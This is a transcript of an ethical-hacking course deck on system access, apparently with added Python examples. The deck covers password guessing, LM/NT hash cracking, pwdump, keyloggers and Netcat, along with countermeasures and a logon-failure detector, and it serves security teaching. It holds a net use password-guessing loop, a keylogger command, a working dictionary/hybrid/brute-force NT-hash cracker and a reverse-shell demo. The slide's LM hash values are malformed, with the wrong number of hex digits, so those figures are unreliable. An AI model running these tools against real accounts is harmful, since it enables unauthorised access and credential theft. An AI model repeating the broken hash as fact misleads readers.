Ethical Hacking - PowerPoint PPT Presentation

Provided by: nebr4
Slides: 27

Transcript and Presenter's Notes

1
Ethical Hacking
  • Phase III
  • System Hacking: Gaining access

2
Module Objective
  • Understand the following:
  • Remote password guessing
  • Password cracking
  • Password sniffers
  • Keystroke loggers
  • Remote control and backdoors
  • Port redirection

3
Administrator Password Guessing
  • Assuming that the NetBIOS session port (TCP 139) is
    open, the most effective method of breaking into
    NT/2000 is password guessing.
  • Attempt to connect to an enumerated share (IPC$ or C$)
    and try username/password pairs.
  • The default ADMIN$, C$ and %SystemDrive% shares are a
    good starting point.

4
Performing automated password guessing
  • Automated password guessing is easy: a simple loop in
    the NT/2000 command shell built on the standard NET USE
    syntax.
  • 1. Create a simple credentials file with one
    "password username" pair per line.
  • 2. Pipe this file into the FOR command (%i is the
    password, %j the username):
  • C:\> FOR /F "tokens=1,2*" %i in (credentials.txt)
    do net use \\target\IPC$ %i /u:%j
  • Mind the target's account lockout threshold: a loop
    like this locks the account after a handful of bad
    guesses and leaves event 529/539 entries in the
    Security log.

5
Tool: Legion
  • Legion automates password guessing over NetBIOS
    sessions. It scans multiple Class C IP address ranges
    for Windows shares and also offers a manual dictionary
    attack tool.

6
Password guessing Countermeasures
  • Block access to TCP and UDP ports 135-139 (and TCP 445,
    SMB directly over TCP) at the perimeter.
  • Disable NetBIOS over TCP/IP (the WINS client binding) on
    any adapter that does not need it.
  • Use complex passwords and an account lockout threshold.
  • Audit and log failed logon attempts (Event Viewer,
    Security log, Logon/Logoff category): event 529 is
    "Logon failure: unknown user name or bad password" and
    event 539 is "Logon failure: account locked out".

7
Password Sniffing
  • Password guessing is hard work. Why not just
    sniff credentials off the wire as users log in to
    a server and then replay them to gain access?

8
Hacking Tool: L0phtCrack
  • LC4 is a password auditing and recovery package
    distributed by @stake. Its SMB packet capture listens
    on the local network segment and captures individual
    login sessions (the LM/NTLM challenge-response
    exchanges).
  • Fed into the L0phtCrack cracking engine, a capture
    taken over an extended period is almost guaranteed to
    yield Administrator credentials within a matter of
    days.

9
Hacking Tool: KerbCrack
  • KerbCrack consists of two programs, kerbsniff and
    kerbcrack. The sniffer listens on the network and
    captures Windows 2000/XP Kerberos logins. The
    cracker recovers the passwords from the capture file
    using a brute-force or a dictionary attack.

10
Types of Password Attacks
  • Dictionary attack
  • Brute force attack
  • Hybrid attack
  • Social engineering
  • Shoulder surfing
  • Dumpster diving

11
Password Types
  • Passwords that contain only letters.
  • Passwords that contain only numbers.
  • Passwords that contain only special characters.
  • Passwords that contain letters and numbers.
  • Passwords that contain only letters and special
    characters.
  • Passwords that contain only special characters
    and numbers.
  • Passwords that contain letters, special
    characters and numbers.

12
What is a LanManager Hash?
  • Example: let's say your password is '123456qwerty'.
  • When this password is hashed with the LM algorithm it
    is first converted to all uppercase: '123456QWERTY'.
  • The password is padded with null bytes to a length of
    14 characters (and truncated if it is longer):
    '123456QWERTY' followed by two nulls.
  • Before the DES step, the 14-character string is split
    into two 7-character halves: '123456Q' and 'WERTY'
    followed by two nulls.
  • Each half is used as a 56-bit DES key to encrypt the
    fixed string 'KGS!@#$%', and the two 8-byte results
    are concatenated. The password is the key, not the
    plaintext; there is no salt, so two users with the
    same password get the same hash.
  • '123456Q' 6BF11E04AFAB197F
  • 'WERTY' + nulls F1E9FFDCC75575B15
  • The hash is 6BF11E04AFAB197FF1E9FFDCC75575B15
  • Note: the first half contains alphanumeric characters
    and takes L0phtCrack about 24 hours to crack; the
    second half, effectively a 5-letter alphabetic string,
    takes about 60 seconds. Because each half is attacked
    independently, the effective password length is 7,
    not 14, and case is lost.
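The LM steps above carried out in code, as an added example that is not part of the slides. It assumes pycryptodome (Crypto.Cipher.DES) is available for the DES step; the preprocessing, the 7-byte-to-8-byte DES key expansion and the keyspace comparison need only the standard library. The names EMPTY_HALF, lm_keyspace and the function names are this example's own.

```python
# Added example: LM preprocessing and DES-key derivation as described on the slide.
# Assumption: pycryptodome (Crypto.Cipher.DES) is installed for the DES step.

LM_MAGIC = b"KGS!@#$%"   # fixed 8-byte plaintext; the password half is the DES key


def lm_preprocess(password: str) -> tuple:
    """Uppercase, truncate/pad to 14 bytes with NULs, split into two 7-byte halves."""
    p = password.upper().encode("ascii", "replace")[:14]  # LM is case-insensitive, max 14 chars
    p = p.ljust(14, b"\x00")                               # short passwords are NUL-padded
    return p[:7], p[7:]


def des_key_from_7(half: bytes) -> bytes:
    """Spread the 56 key bits over 8 bytes: 7 bits each, MSB-aligned, low bit = odd parity.
    DES ignores the parity bit, so only the 56 real bits influence the hash."""
    if len(half) != 7:
        raise ValueError("need exactly 7 bytes")
    n = int.from_bytes(half, "big")
    key = bytearray()
    for i in range(8):
        seven = (n >> (49 - 7 * i)) & 0x7F
        parity = 0 if bin(seven).count("1") % 2 else 1
        key.append((seven << 1) | parity)
    return bytes(key)


def lm_hash(password: str) -> str:
    """LM hash as upper-case hex: DES_k1(KGS!@#$%) || DES_k2(KGS!@#$%)."""
    try:
        from Crypto.Cipher import DES       # pycryptodome (assumed installed)
    except ImportError as exc:
        raise RuntimeError("pycryptodome is required for the DES step") from exc
    out = b""
    for half in lm_preprocess(password):
        out += DES.new(des_key_from_7(half), DES.MODE_ECB).encrypt(LM_MAGIC)
    return out.hex().upper()


# DES of the magic under an all-NUL half: seeing this as the second half of a dumped
# LM hash tells you the password is at most 7 characters long.
EMPTY_HALF = "AAD3B435B51404EE"


def lm_keyspace(charset_size: int) -> tuple:
    """Work factor: two independent 7-char halves versus one 14-char string."""
    return 2 * charset_size ** 7, charset_size ** 14


if __name__ == "__main__":
    first, second = lm_preprocess("123456qwerty")
    print(first, second)
    print(des_key_from_7(first).hex(), des_key_from_7(second).hex())
    print("halves vs full, 69-char set:", lm_keyspace(69))
    try:
        print(lm_hash("123456qwerty"))
    except RuntimeError as err:
        print(err)
```

The 'WERTY' half is five letters plus two NULs, which is why it falls in seconds; and whenever the second 16 hex digits of a dumped LM hash equal AAD3B435B51404EE the password is known to be 7 characters or fewer before any cracking starts.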

13
Manual Password Cracking Algorithm
  • Find a valid user
  • Create a list of possible passwords
  • Rank the passwords from high probability to low
  • Key in each password
  • If the system allows you in - Success
  • Else try till success

14
Automatic Password Cracking Algorithm
  • Find a valid user
  • Find the hash algorithm used
  • Obtain the password hashes
  • Create a list of possible passwords
  • Hash each candidate word
  • See if there is a match for each user ID
  • Repeat steps 4 through 6 with new candidates until a
    match is found or the list is exhausted
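The procedure above run against a pwdump-style dump, as an added example that is not part of the slides. It combines the dictionary, hybrid and brute-force attacks from the "Types of Password Attacks" slide with the automatic cracking steps listed here. The target is the NT hash (MD4 over the UTF-16LE password, unsalted); MD4 is written out because hashlib's md4 is often disabled in current OpenSSL builds. The dump, wordlist, user names and the function names are constructed for this example.

```python
# Added example (not from the slides): automatic cracking of NT hashes from a
# pwdump-style dump.  Everything here is standard library.
import itertools
import struct

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320), the primitive behind the NT hash."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (G, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a, b, c, d = d, rol((a + fn(b, c, d) + X[idx] + k) & MASK, shifts[i % 4]), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash: MD4 over the UTF-16LE password, lower-case hex. No salt, case preserved."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump(text: str) -> list:
    """pwdump lines look like  user:rid:lmhash:nthash:::  ; return (user, nthash) pairs."""
    targets = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) >= 4 and len(parts[3]) == 32:
            targets.append((parts[0], parts[3].lower()))
    return targets


def hybrid(words, max_suffix=99):
    """Hybrid attack: each word as-is and capitalised, then with 0..99 appended."""
    for w in words:
        for v in (w, w.capitalize()):
            yield v
            for n in range(max_suffix + 1):
                yield f"{v}{n}"


def brute_force(charset, max_len):
    """Exhaustive search over charset, lengths 1..max_len."""
    for length in range(1, max_len + 1):
        for chars in itertools.product(charset, repeat=length):
            yield "".join(chars)


def crack(targets, candidates) -> dict:
    """Hash each candidate once and look it up against every still-uncracked user:
    with an unsalted hash one computation tests all users at the same time."""
    wanted = {}
    for user, h in targets:
        wanted.setdefault(h, []).append(user)
    found = {}
    for cand in candidates:
        if not wanted:
            break
        h = nt_hash(cand)
        if h in wanted:
            for user in wanted.pop(h):
                found[user] = cand
    return found


# Constructed dump.  The LM field is the "empty LM" marker (LM storage disabled).
# The first two NT values are the well-known hashes of "password" and of the empty
# password; the other two are generated here so the sample stays self-consistent.
SAMPLE_DUMP = "\n".join([
    "Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::",
    "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "jdoe:1001:aad3b435b51404eeaad3b435b51404ee:" + nt_hash("Summer7") + ":::",
    "svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:" + nt_hash("1234") + ":::",
])
WORDLIST = ["password", "summer", "welcome", "letmein"]   # constructed dictionary


def run_attacks(dump=SAMPLE_DUMP, words=WORDLIST) -> dict:
    """Cheap attacks first (empty, dictionary, hybrid), then a short brute force."""
    candidates = itertools.chain([""], words, hybrid(words), brute_force("0123456789", 4))
    return crack(parse_pwdump(dump), candidates)


if __name__ == "__main__":
    for user, pw in run_attacks().items():
        print(f"{user}: {pw!r}")
```

Ordering the candidate sources from cheapest to most expensive is what a real cracker does too; the empty password and the dictionary fall out immediately, the hybrid rule catches the "word plus digit" habit, and exhaustive search is reserved for what is left.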

15
Password Cracking Countermeasures
  • Enforce 7-12 character alphanumeric passwords (where
    LM hashing is still in use, anything up to 7 characters
    is a single half, so prefer the upper end or longer).
  • Set the password change policy to 30 days.
  • Physically isolate and protect the server.
  • Use the SYSKEY utility so the hashes stored on disk are
    encrypted with an additional key.
  • Disable LM hash storage (the NoLMHash policy) so only
    NT hashes are kept.
  • Monitor the server logs for brute-force attacks on
    user accounts.
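A small detector for the last bullet, as an added example that is not part of the slides; it also covers the auditing bullet on the password guessing countermeasures slide (events 529 and 539). The log lines are constructed in a simple "timestamp,event id,user,workstation" form rather than the Event Viewer export format, the thresholds are demo values, and the function names are this example's own. The event ID sets also include the Vista-and-later equivalents, 4625 (failed logon) and 4740 (account locked out).

```python
# Added example (not from the slides): flag guessing bursts and lockouts in
# failed-logon audit events.  Standard library only; log lines are constructed.
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAILED_LOGON = {529, 4625}   # 529 on NT/2000/XP; 4625 on Vista and later
LOCKED_OUT = {539, 4740}     # 539 on NT/2000/XP; 4740 on Vista and later

# Constructed sample: one user mistyping twice, one workstation hammering three accounts.
SAMPLE_LOG = """\
2004-03-02 09:00:01,529,alice,WS-ALICE
2004-03-02 09:00:15,529,Administrator,WS-UNKNOWN
2004-03-02 09:00:16,529,Administrator,WS-UNKNOWN
2004-03-02 09:00:17,529,backup,WS-UNKNOWN
2004-03-02 09:00:18,529,backup,WS-UNKNOWN
2004-03-02 09:00:19,529,jdoe,WS-UNKNOWN
2004-03-02 09:00:20,529,jdoe,WS-UNKNOWN
2004-03-02 09:00:21,539,Administrator,WS-UNKNOWN
2004-03-02 09:30:00,529,alice,WS-ALICE
"""


def parse_log(text: str) -> list:
    """Parse 'timestamp,event id,user,workstation' lines into tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, user, src = [p.strip() for p in line.split(",")]
        events.append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), int(eid), user, src))
    return events


def detect(events, threshold=5, window=timedelta(minutes=2)) -> list:
    """Alert on a source with >= threshold failed logons inside `window` (what a
    NET USE guessing loop produces) and on every lockout.  One alert per burst."""
    recent = defaultdict(deque)   # source -> (timestamp, user) of failures in the window
    alerted = set()
    alerts = []
    for ts, eid, user, src in sorted(events):
        if eid in LOCKED_OUT:
            alerts.append({"kind": "lockout", "source": src, "user": user, "at": ts})
            continue
        if eid not in FAILED_LOGON:
            continue
        q = recent[src]
        q.append((ts, user))
        while q and ts - q[0][0] > window:
            q.popleft()               # drop failures that fell out of the window
        if len(q) >= threshold and src not in alerted:
            alerted.add(src)
            alerts.append({"kind": "burst", "source": src, "failures": len(q),
                           "users": len({u for _, u in q}), "at": ts})
        elif len(q) < threshold:
            alerted.discard(src)      # burst ended; a later one may alert again
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_log(SAMPLE_LOG)):
        print(alert)
```

The "users" count in a burst alert separates a single user who forgot a password from one workstation walking a list of accounts, which is the pattern the Legion and FOR/NET USE loops leave behind.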

16
Hacking tools: cracking offline
  • Pwdump (first version) only works on Windows NT 4.0
    before Service Pack 3, which introduced SYSKEY (the
    extra encryption layer over the SAM hashes).
  • It dumps the SAM hashes so they can be cracked offline.

17
Hacking tools: cracking offline
  • Pwdump2 works with NT SP3 and later (SYSKEY), and
    also with Windows 2000 and XP.
  • It is based on an attack called DLL injection, which
    needs a target process running under a privileged
    account.
  • That process is lsass.exe, the Local Security Authority
    Subsystem Service, which holds the hashes in memory.
  • It must be launched locally and as administrator.
  • It can be used to detect weak passwords on your own
    system :-)

18
Hacking tools: cracking offline
  • Pwdump3e gives access to a remote SAM, but we need
    administrator privileges on the target.
  • It connects to the ADMIN$ share, installs the
    samdump.dll library and a service (pwservice.exe) on
    the remote machine, and that service extracts the
    hashes from the SAM.
  • Always over SMB (TCP 139 and 445).
  • Pwdump4, 5 and 6.
  • They can be obtained from Openwall (bringing
    security into open environments):
    http://www.openwall.com/passwords/microsoft-windows-nt-2000-xp-2003

19
Cracking NT/2000 passwords
  • The SAM file in Windows NT/2000 contains the usernames
    and password hashes. It is located in the
    %SystemRoot%\system32\config directory.
  • The file is locked while the OS is running.
  • Therefore we must...

20
Cracking NT/2000 passwords
  • Offline password reset: boot an alternate OS (Linux)
    from a diskette or CD and blank the Administrator
    password in the SAM.
  • This needs physical access to the computer.
  • Or extract the hashes from the SAM and use L0phtCrack
    to crack them (we'll see it soon).

21
Hacking Tool: John the Ripper
  • A command-line tool designed to crack both Unix and NT
    passwords. John is extremely fast and free.
  • When cracking LM hashes the recovered passwords come
    out in upper case, because LM discards case: they may
    not be the real mixed-case password (the NT hash keeps
    case and can be used to recover it).

22
Hacking Tool: Cain & Abel
  • A tool that lets us:
  • Get the password hashes from a local or remote SAM
  • Get any password stored locally (Internet Explorer,
    Outlook, MSN, ...)
  • Sniff passwords.
  • On switched networks it uses ARP cache poisoning to
    mount a man-in-the-middle attack.
  • It is also a wireless hacking tool.
  • Lab 4: Using Cain & Abel

23
Keystroke Loggers
  • If all other attempts to sniff out domain privileges
    fail, a keystroke logger is the solution.
  • Keystroke loggers are stealthy software or hardware
    that sits between the keyboard and the applications (a
    software logger hooks keyboard input inside the
    operating system, a hardware one sits on the cable),
    so that every key stroke is recorded.
  • There are two types of keystroke loggers:
  • 1. Software based and
  • 2. Hardware based.

24
Hacking Tool: Hardware Key Logger
(www.keyghost.com)
  • A hardware key logger is connected between the keyboard
    and the computer. It needs no software on the host and
    is invisible to the OS, but it requires physical access
    both to install and to retrieve.

25
LKL Linux KeyLogger
  • Lab 5: Using a keylogger
  • Download from SourceForge, or better:
  • sudo apt-get install lkl
  • sudo lkl -l -k /usr/share/lkl/keymaps/it_km -o log.file
    (-l logs keystrokes, -k selects the keymap, here the
    Italian one, -o names the output file; it needs root
    because it reads the keyboard hardware port directly)

26
Trojans and backdoors
  • Another super tool: Netcat
  • Also called the Swiss Army knife of networking
  • It can be used for many things:
  • Messenger
  • Email
  • FTP
  • Scanner
  • Remote shell
  • Reverse remote shell, which gets past firewalls
    because the victim opens the outbound connection.
  • Lab 6: Using netcat
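The reverse-shell idea behind "nc -e" written out in plain Python sockets, as an added example that is not part of the slides or of Netcat itself. It runs entirely on loopback: the "victim" side dials out to the listener and executes the one line it receives, which is the direction an egress firewall usually allows. The host, port choice, command and function names are this example's own.

```python
# Added example (not from the slides): reverse connection on loopback.  The
# victim connects OUT to the attacker's listener, then runs what it is sent.
import socket
import subprocess
import sys
import threading


def victim_connect_back(host: str, port: int) -> None:
    """Victim side: outbound connect, read one command line, run it, return the output."""
    with socket.create_connection((host, port)) as s:
        cmd = s.makefile("r").readline().rstrip("\n")
        # Real nc -e hands the socket to a shell; here the command is a Python snippet
        # so the demo does not depend on a particular OS shell.
        proc = subprocess.run([sys.executable, "-c", cmd], capture_output=True, text=True)
        s.sendall((proc.stdout + proc.stderr).encode())
        s.shutdown(socket.SHUT_WR)      # EOF tells the listener the reply is complete


def attacker_listen(command: str) -> str:
    """Attacker side (the "nc -l -p <port>" end): wait for the call-back, send one
    command, collect the reply.  The victim is started in a thread to keep it local."""
    srv = socket.socket()
    srv.settimeout(10)
    srv.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]
    t = threading.Thread(target=victim_connect_back, args=("127.0.0.1", port))
    t.start()
    conn, _ = srv.accept()              # the victim's outbound connection arrives here
    with srv, conn:
        conn.sendall(command.encode() + b"\n")
        reply = b""
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                break
            reply += chunk
    t.join()
    return reply.decode()


if __name__ == "__main__":
    print(attacker_listen("import platform; print(platform.node())"))
```

Nothing listens on the victim, so an inbound-only filter never sees a port to block; detection has to look at unexpected outbound connections and at shells whose parent is a network-facing process.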